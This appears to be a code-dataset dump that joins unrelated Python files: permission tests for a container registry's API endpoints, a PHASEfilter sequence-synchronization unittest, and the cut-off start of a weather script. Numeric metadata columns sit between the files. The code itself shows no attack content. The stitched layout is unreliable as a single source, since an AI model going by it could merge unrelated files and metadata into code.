PUBLIC_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_layer", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_layer", image_id=FAKE_IMAGE_ID), ORG_REPO, 403, 403, 403, 403, 400
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_layer", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_checksum", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_checksum", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_checksum", image_id=FAKE_IMAGE_ID),
ORG_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_checksum", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.get_image_json", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
404,
404,
404,
404,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_json", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_json", image_id=FAKE_IMAGE_ID), ORG_REPO, 403, 403, 404, 403, 404
),
IndexV1TestSpec(
url_for("v1.get_image_json", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_ancestry", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
404,
404,
404,
404,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_ancestry", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_ancestry", image_id=FAKE_IMAGE_ID),
ORG_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_ancestry", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
404,
),
IndexV1TestSpec(
url_for("v1.put_image_json", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_json", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_json", image_id=FAKE_IMAGE_ID), ORG_REPO, 403, 403, 403, 403, 400
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_json", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(url_for("v1.create_user"), NO_REPO, 400, 400, 400, 400, 400)
.set_method("POST")
.set_data_from_obj(NEW_USER_DETAILS),
IndexV1TestSpec(url_for("v1.get_user"), NO_REPO, 404, 200, 200, 200, 200),
IndexV1TestSpec(
url_for("v1.update_user", username=FAKE_USERNAME), NO_REPO, 403, 403, 403, 403, 403
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=PUBLIC_REPO),
NO_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=PRIVATE_REPO),
NO_REPO,
403,
403,
403,
403,
201,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=ORG_REPO), NO_REPO, 403, 403, 403, 403, 201
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=ANOTHER_ORG_REPO),
NO_REPO,
403,
403,
403,
403,
201,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=NEW_ORG_REPO),
NO_REPO,
401,
403,
403,
201,
201,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.update_images", repository=PUBLIC_REPO), NO_REPO, 403, 403, 403, 403, 403
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.update_images", repository=PRIVATE_REPO), NO_REPO, 403, 403, 403, 403, 400
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.update_images", repository=ORG_REPO), NO_REPO, 403, 403, 403, 403, 400
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.update_images", repository=ANOTHER_ORG_REPO),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.get_repository_images", repository=PUBLIC_REPO),
NO_REPO,
200,
200,
200,
200,
200,
),
IndexV1TestSpec(
url_for("v1.get_repository_images", repository=PRIVATE_REPO),
NO_REPO,
403,
403,
200,
403,
200,
),
IndexV1TestSpec(
url_for("v1.get_repository_images", repository=ORG_REPO),
NO_REPO,
403,
403,
200,
403,
200,
),
IndexV1TestSpec(
url_for("v1.get_repository_images", repository=ANOTHER_ORG_REPO),
NO_REPO,
403,
403,
403,
403,
200,
),
IndexV1TestSpec(
url_for("v1.delete_repository_images", repository=PUBLIC_REPO),
NO_REPO,
501,
501,
501,
501,
501,
).set_method("DELETE"),
IndexV1TestSpec(
url_for("v1.put_repository_auth", repository=PUBLIC_REPO),
NO_REPO,
501,
501,
501,
501,
501,
).set_method("PUT"),
IndexV1TestSpec(url_for("v1.get_search"), NO_REPO, 200, 200, 200, 200, 200),
IndexV1TestSpec(url_for("v1.ping"), NO_REPO, 200, 200, 200, 200, 200),
IndexV1TestSpec(
url_for("v1.get_tags", repository=PUBLIC_REPO), NO_REPO, 200, 200, 200, 200, 200
),
IndexV1TestSpec(
url_for("v1.get_tags", repository=PRIVATE_REPO), NO_REPO, 403, 403, 200, 403, 200
),
IndexV1TestSpec(
url_for("v1.get_tags", repository=ORG_REPO), NO_REPO, 403, 403, 200, 403, 200
),
IndexV1TestSpec(
url_for("v1.get_tags", repository=ANOTHER_ORG_REPO), NO_REPO, 403, 403, 403, 403, 200
),
IndexV1TestSpec(
url_for("v1.get_tag", repository=PUBLIC_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
404,
404,
404,
404,
404,
),
IndexV1TestSpec(
url_for("v1.get_tag", repository=PRIVATE_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_tag", repository=ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_tag", repository=ANOTHER_ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
404,
),
IndexV1TestSpec(
url_for("v1.put_tag", repository=PUBLIC_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_tag", repository=PRIVATE_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_tag", repository=ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_tag", repository=ANOTHER_ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.delete_tag", repository=PUBLIC_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
403,
).set_method("DELETE"),
IndexV1TestSpec(
url_for("v1.delete_tag", repository=PRIVATE_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("DELETE"),
IndexV1TestSpec(
url_for("v1.delete_tag", repository=ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("DELETE"),
IndexV1TestSpec(
url_for("v1.delete_tag", repository=ANOTHER_ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("DELETE"),
]
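
# Illustrative sketch (an assumption, not part of this module): a harness
# consuming the v1 specs above might look roughly like this, driving Flask's
# test client with the method/data/content-type bundled by get_client_args().
# The `app` argument and the choice to check only the anonymous code here are
# hypothetical simplifications.
def _check_v1_spec_anonymous(app, spec):
    url, kwargs = spec.get_client_args()
    with app.test_client() as client:
        response = client.open(url, **kwargs)
        assert response.status_code == spec.anon_code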
class IndexV2TestSpec(object):
def __init__(self, index_name, method_name, repo_name, scope=None, **kwargs):
self.index_name = index_name
self.repo_name = repo_name
self.method_name = method_name
default_scope = "push,pull" if method_name != "GET" and method_name != "HEAD" else "pull"
self.scope = scope or default_scope
self.kwargs = kwargs
self.anon_code = 401
self.no_access_code = 403
self.read_code = 200
self.admin_code = 200
self.creator_code = 200
def request_status(
self, anon_code=401, no_access_code=403, read_code=200, creator_code=200, admin_code=200
):
self.anon_code = anon_code
self.no_access_code = no_access_code
self.read_code = read_code
self.creator_code = creator_code
self.admin_code = admin_code
return self
def get_url(self):
return url_for(self.index_name, repository=self.repo_name, **self.kwargs)
def gen_basic_auth(self, username, password):
encoded = b64encode(b"%s:%s" % (username.encode("ascii"), password.encode("ascii")))
return "basic %s" % encoded.decode("ascii")
def get_scope_string(self):
return "repository:%s:%s" % (self.repo_name, self.scope)
def build_v2_index_specs():
return [
# v2.list_all_tags
IndexV2TestSpec("v2.list_all_tags", "GET", PUBLIC_REPO).request_status(
200, 200, 200, 200, 200
),
IndexV2TestSpec("v2.list_all_tags", "GET", PRIVATE_REPO).request_status(
401, 401, 200, 401, 200
),
IndexV2TestSpec("v2.list_all_tags", "GET", ORG_REPO).request_status(
401, 401, 200, 401, 200
),
IndexV2TestSpec("v2.list_all_tags", "GET", ANOTHER_ORG_REPO).request_status(
401, 401, 401, 401, 200
),
# v2.fetch_manifest_by_tagname
IndexV2TestSpec(
"v2.fetch_manifest_by_tagname", "GET", PUBLIC_REPO, manifest_ref=FAKE_MANIFEST
).request_status(404, 404, 404, 404, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_tagname", "GET", PRIVATE_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_tagname", "GET", ORG_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_tagname", "GET", ANOTHER_ORG_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 404),
# v2.fetch_manifest_by_digest
IndexV2TestSpec(
"v2.fetch_manifest_by_digest", "GET", PUBLIC_REPO, manifest_ref=FAKE_DIGEST
).request_status(404, 404, 404, 404, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_digest", "GET", PRIVATE_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_digest", "GET", ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_digest", "GET", ANOTHER_ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
# v2.write_manifest_by_tagname
IndexV2TestSpec(
"v2.write_manifest_by_tagname", "PUT", PUBLIC_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.write_manifest_by_tagname", "PUT", PRIVATE_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.write_manifest_by_tagname", "PUT", ORG_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.write_manifest_by_tagname", "PUT", ANOTHER_ORG_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 400),
# v2.write_manifest_by_digest
IndexV2TestSpec(
"v2.write_manifest_by_digest", "PUT", PUBLIC_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.write_manifest_by_digest", "PUT", PRIVATE_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.write_manifest_by_digest", "PUT", ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.write_manifest_by_digest", "PUT", ANOTHER_ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 400),
# v2.delete_manifest_by_digest
IndexV2TestSpec(
"v2.delete_manifest_by_digest", "DELETE", PUBLIC_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.delete_manifest_by_digest", "DELETE", PRIVATE_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.delete_manifest_by_digest", "DELETE", ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.delete_manifest_by_digest", "DELETE", ANOTHER_ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
# v2.check_blob_exists
IndexV2TestSpec(
"v2.check_blob_exists", "HEAD", PUBLIC_REPO, digest=FAKE_DIGEST
).request_status(404, 404, 404, 404, 404),
IndexV2TestSpec(
"v2.check_blob_exists", "HEAD", PRIVATE_REPO, digest=FAKE_DIGEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.check_blob_exists", "HEAD", ORG_REPO, digest=FAKE_DIGEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.check_blob_exists", "HEAD", ANOTHER_ORG_REPO, digest=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
# v2.download_blob
IndexV2TestSpec("v2.download_blob", "GET", PUBLIC_REPO, digest=FAKE_DIGEST).request_status(
404, 404, 404, 404, 404
),
IndexV2TestSpec("v2.download_blob", "GET", PRIVATE_REPO, digest=FAKE_DIGEST).request_status(
401, 401, 404, 401, 404
),
IndexV2TestSpec("v2.download_blob", "GET", ORG_REPO, digest=FAKE_DIGEST).request_status(
401, 401, 404, 401, 404
),
IndexV2TestSpec(
"v2.download_blob", "GET", ANOTHER_ORG_REPO, digest=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
# v2.start_blob_upload
IndexV2TestSpec("v2.start_blob_upload", "POST", PUBLIC_REPO).request_status(
401, 401, 401, 401, 401
),
IndexV2TestSpec("v2.start_blob_upload", "POST", PRIVATE_REPO).request_status(
401, 401, 401, 401, 202
),
IndexV2TestSpec("v2.start_blob_upload", "POST", ORG_REPO).request_status(
401, 401, 401, 401, 202
),
IndexV2TestSpec("v2.start_blob_upload", "POST", ANOTHER_ORG_REPO).request_status(
401, 401, 401, 401, 202
),
# v2.fetch_existing_upload
IndexV2TestSpec(
"v2.fetch_existing_upload", "GET", PUBLIC_REPO, "push,pull", upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.fetch_existing_upload", "GET", PRIVATE_REPO, "push,pull", upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.fetch_existing_upload", "GET", ORG_REPO, "push,pull", upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.fetch_existing_upload",
"GET",
ANOTHER_ORG_REPO,
"push,pull",
upload_uuid=FAKE_UPLOAD_ID,
).request_status(401, 401, 401, 401, 404),
# v2.upload_chunk
IndexV2TestSpec(
"v2.upload_chunk", "PATCH", PUBLIC_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.upload_chunk", "PATCH", PRIVATE_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.upload_chunk", "PATCH", ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.upload_chunk", "PATCH", ANOTHER_ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
# v2.monolithic_upload_or_last_chunk
IndexV2TestSpec(
"v2.monolithic_upload_or_last_chunk", "PUT", PUBLIC_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.monolithic_upload_or_last_chunk", "PUT", PRIVATE_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.monolithic_upload_or_last_chunk", "PUT", ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.monolithic_upload_or_last_chunk",
"PUT",
ANOTHER_ORG_REPO,
upload_uuid=FAKE_UPLOAD_ID,
).request_status(401, 401, 401, 401, 400),
# v2.cancel_upload
IndexV2TestSpec(
"v2.cancel_upload", "DELETE", PUBLIC_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.cancel_upload", "DELETE", PRIVATE_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.cancel_upload", "DELETE", ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.cancel_upload", "DELETE", ANOTHER_ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
]
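
# Illustrative sketch (assumption): unlike the v1 specs, the v2 specs carry a
# registry-style scope string instead of client kwargs, so a harness would
# first mint a bearer token for spec.get_scope_string() and then hit
# spec.get_url() with the spec's HTTP method. Token minting is elided here;
# `token` and `expected_code` are supplied by the hypothetical caller.
def _check_v2_spec(app, spec, token, expected_code):
    with app.test_client() as client:
        response = client.open(
            spec.get_url(),
            method=spec.method_name,
            headers={"Authorization": "Bearer %s" % token},
        )
        assert response.status_code == expected_code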
| 31.937659
| 100
| 0.553679
| 2,788
| 25,103
| 4.656743
| 0.058465
| 0.059616
| 0.056844
| 0.106293
| 0.820689
| 0.797813
| 0.779173
| 0.750751
| 0.731033
| 0.718786
| 0
| 0.11948
| 0.337848
| 25,103
| 785
| 101
| 31.978344
| 0.661593
| 0.012389
| 0
| 0.711354
| 0
| 0
| 0.127936
| 0.045242
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016416
| false
| 0.008208
| 0.005472
| 0.005472
| 0.038304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
627c9ad78030e4fa27721b044ee4518226e6cb90
| 8,526
|
py
|
Python
|
PHASEfilter/tests/test_synchronization.py
|
ibigen/PHASEfilter
|
669729f408b9c23d5db2ba72e74195b2228669da
|
[
"MIT"
] | null | null | null |
PHASEfilter/tests/test_synchronization.py
|
ibigen/PHASEfilter
|
669729f408b9c23d5db2ba72e74195b2228669da
|
[
"MIT"
] | null | null | null |
PHASEfilter/tests/test_synchronization.py
|
ibigen/PHASEfilter
|
669729f408b9c23d5db2ba72e74195b2228669da
|
[
"MIT"
] | null | null | null |
'''
Created on 16/06/2020
@author: mmp
'''
import unittest, os
from PHASEfilter.lib.utils.util import Utils
from PHASEfilter.lib.utils.reference import Reference
from PHASEfilter.lib.utils.lift_over_simple import LiftOverLight
from PHASEfilter.lib.process.process_references import ProcessTwoReferences
from PHASEfilter.lib.utils.software import Software
class Test(unittest.TestCase):
def test_sync(self):
utils = Utils("synchronize")
temp_work_dir = utils.get_temp_dir()
seq_file_name_a = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S01.chrXVI.fa')
seq_file_name_b = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S228C.chrXVI.fa')
self.assertTrue(os.path.exists(seq_file_name_a))
self.assertTrue(os.path.exists(seq_file_name_b))
seq_name_a = "chrXVI"
seq_name_b = "chrXVI"
reference_a = Reference(seq_file_name_a)
reference_b = Reference(seq_file_name_b)
impose_minimap2_only = False
lift_over_ligth = LiftOverLight(reference_a, reference_b, temp_work_dir, impose_minimap2_only, True)
lift_over_ligth.synchronize_sequences(seq_name_a, seq_name_b)
self.assertEqual(Software.SOFTWARE_minimap2_name, lift_over_ligth.get_best_algorithm(seq_name_a, seq_name_b))
### test positions
temp_file = utils.get_temp_file("base_name", ".fasta")
### test some positions
position_to_test = 426
self.assertEqual((-1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
position_to_test = 427
self.assertEqual((1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 1, 2, temp_file))
position_to_test = 428
self.assertEqual((2, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 2, 3, temp_file))
position_to_test = 10000
self.assertEqual((9585, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9585, 9586, temp_file))
self.assertNotEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9586, 9587, temp_file))
position = 50000
self.assertEqual((49610, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position))
utils.remove_file(temp_file)
temp_out = utils.get_temp_file("out_sync_saccharo", ".txt")
process_two_references = ProcessTwoReferences(seq_file_name_a, seq_file_name_b, temp_out)
process_two_references.process()
out_result_expected = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/out_sync_saccharo.txt')
temp_diff = utils.get_temp_file("diff_file", ".txt")
cmd = "diff {} {} > {}".format(temp_out, out_result_expected, temp_diff)
os.system(cmd)
vect_result = utils.read_text_file(temp_diff)
self.assertEqual(0, len(vect_result))
utils.remove_file(temp_out)
def test_sync_2(self):
utils = Utils("synchronize")
temp_work_dir = utils.get_temp_dir()
seq_file_name_a = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S01.chrXVI.fa')
seq_file_name_b = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S228C.chrXVI.fa')
self.assertTrue(os.path.exists(seq_file_name_a))
self.assertTrue(os.path.exists(seq_file_name_b))
seq_name_a = "chrXVI"
seq_name_b = "chrXVI"
reference_a = Reference(seq_file_name_a)
reference_b = Reference(seq_file_name_b)
impose_minimap2_only = True
lift_over_ligth = LiftOverLight(reference_a, reference_b, temp_work_dir, impose_minimap2_only, True)
lift_over_ligth.synchronize_sequences(seq_name_a, seq_name_b)
temp_file = utils.get_temp_file("base_name", ".fasta")
### test some positions
position_to_test = 426
self.assertEqual((-1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
position_to_test = 427
self.assertEqual((1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 1, 2, temp_file))
position_to_test = 428
self.assertEqual((2, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 2, 3, temp_file))
position_to_test = 10000
self.assertEqual((9585, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9585, 9586, temp_file))
self.assertNotEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9586, 9587, temp_file))
position = 50000
self.assertEqual((49610, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position, position+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 49610, 49611, temp_file))
utils.remove_file(temp_file)
def test_sync_3(self):
utils = Utils("synchronize")
temp_work_dir = utils.get_temp_dir()
seq_file_name_a = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S01.chrXVI.fa')
seq_file_name_b = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'files/referenceSaccharo/S228C.chrXVI.fa')
self.assertTrue(os.path.exists(seq_file_name_a))
self.assertTrue(os.path.exists(seq_file_name_b))
seq_name_a = "chrXVI"
seq_name_b = "chrXVI"
reference_a = Reference(seq_file_name_a)
reference_b = Reference(seq_file_name_b)
impose_minimap2_only = False
lift_over_ligth = LiftOverLight(reference_a, reference_b, temp_work_dir, impose_minimap2_only, True)
lift_over_ligth.synchronize_sequences(seq_name_a, seq_name_b)
### impose lastz best alignment
lift_over_ligth.dt_chain_best_method[seq_name_a + "_" + seq_name_b] = Software.SOFTWARE_lastz_name
self.assertEqual(Software.SOFTWARE_lastz_name, lift_over_ligth.get_best_algorithm(seq_name_a, seq_name_b))
temp_file = utils.get_temp_file("base_name", ".fasta")
### test some positions
position_to_test = 426
self.assertEqual((-1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
position_to_test = 427
self.assertEqual((1, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 1, 2, temp_file))
position_to_test = 428
self.assertEqual((2, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position_to_test, position_to_test+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 2, 3, temp_file))
position_to_test = 10000
self.assertEqual((9585, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position_to_test))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9585, 9586, temp_file))
self.assertNotEqual(reference_a.get_base_in_position(seq_name_a, 10000, 10001, temp_file),
reference_b.get_base_in_position(seq_name_a, 9586, 9587, temp_file))
position = 50000
self.assertEqual((49610, -1), lift_over_ligth.get_pos_in_target(seq_name_a, seq_name_b, position))
self.assertEqual(reference_a.get_base_in_position(seq_name_a, position, position+1, temp_file),
reference_b.get_base_in_position(seq_name_a, 49610, 49611, temp_file))
utils.remove_file(temp_file)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.test_to_remove']
unittest.main()
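
# Reading note on the assertions above (an interpretation of these tests, not
# an authoritative API description): get_pos_in_target() returns a tuple whose
# first element is the synchronized position in the target sequence, with
# (-1, -1) marking a source position that has no counterpart. For example:
#
#     hit, _ = lift_over_ligth.get_pos_in_target("chrXVI", "chrXVI", 427)
#     # hit == 1 for these references; hit == -1 would mean "unmapped"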
| 49.859649
| 129
| 0.7924
| 1,403
| 8,526
| 4.33856
| 0.079116
| 0.087399
| 0.068342
| 0.078199
| 0.847544
| 0.843765
| 0.841137
| 0.84048
| 0.84048
| 0.84048
| 0
| 0.03763
| 0.099226
| 8,526
| 171
| 130
| 49.859649
| 0.754948
| 0.02205
| 0
| 0.796875
| 0
| 0
| 0.053511
| 0.032828
| 0
| 0
| 0
| 0
| 0.296875
| 1
| 0.023438
| false
| 0
| 0.046875
| 0
| 0.078125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6569a6e340724c91abd951ef2f5a99f54b9d871b
| 1,628
|
py
|
Python
|
mapping meteo croix lille calais.py
|
DacruzJonathan/Projet_carto_map
|
78fac371a8e92e152dce78a47f01b3b150851fa3
|
[
"CC0-1.0"
] | null | null | null |
mapping meteo croix lille calais.py
|
DacruzJonathan/Projet_carto_map
|
78fac371a8e92e152dce78a47f01b3b150851fa3
|
[
"CC0-1.0"
] | null | null | null |
mapping meteo croix lille calais.py
|
DacruzJonathan/Projet_carto_map
|
78fac371a8e92e152dce78a47f01b3b150851fa3
|
[
"CC0-1.0"
] | null | null | null |
import requests

# OpenWeatherMap current-weather endpoint. The API key and the metric units
# come from the original script; the three identical per-city blocks are
# folded into a single loop without changing the printed output.
URL_TEMPLATE = (
